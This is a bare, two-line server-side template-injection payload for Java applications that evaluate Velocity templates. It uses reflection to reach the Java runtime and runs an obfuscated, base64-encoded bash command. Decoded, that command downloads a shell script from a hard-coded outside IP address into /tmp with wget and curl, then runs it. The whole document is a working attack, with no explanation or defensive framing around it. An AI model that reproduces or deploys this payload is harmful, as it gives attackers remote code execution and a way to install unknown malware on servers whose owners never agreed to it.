#set($ex=$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec("bash -c {eval,$({tr,/+,_-}<<<d2dldCBodHRwOi8vODkuMjIxLjUyLjEyMi9zLnNoIC1PIC90bXAvcy5zaDtjdXJsIGh0dHA6Ly84OS4yMjEuNTIuMTIyL3Muc2ggLUwgPiAvdG1wL3Muc2g7c2ggIC90bXAvcy5zaA==|{base64,--decode})}"))
#end
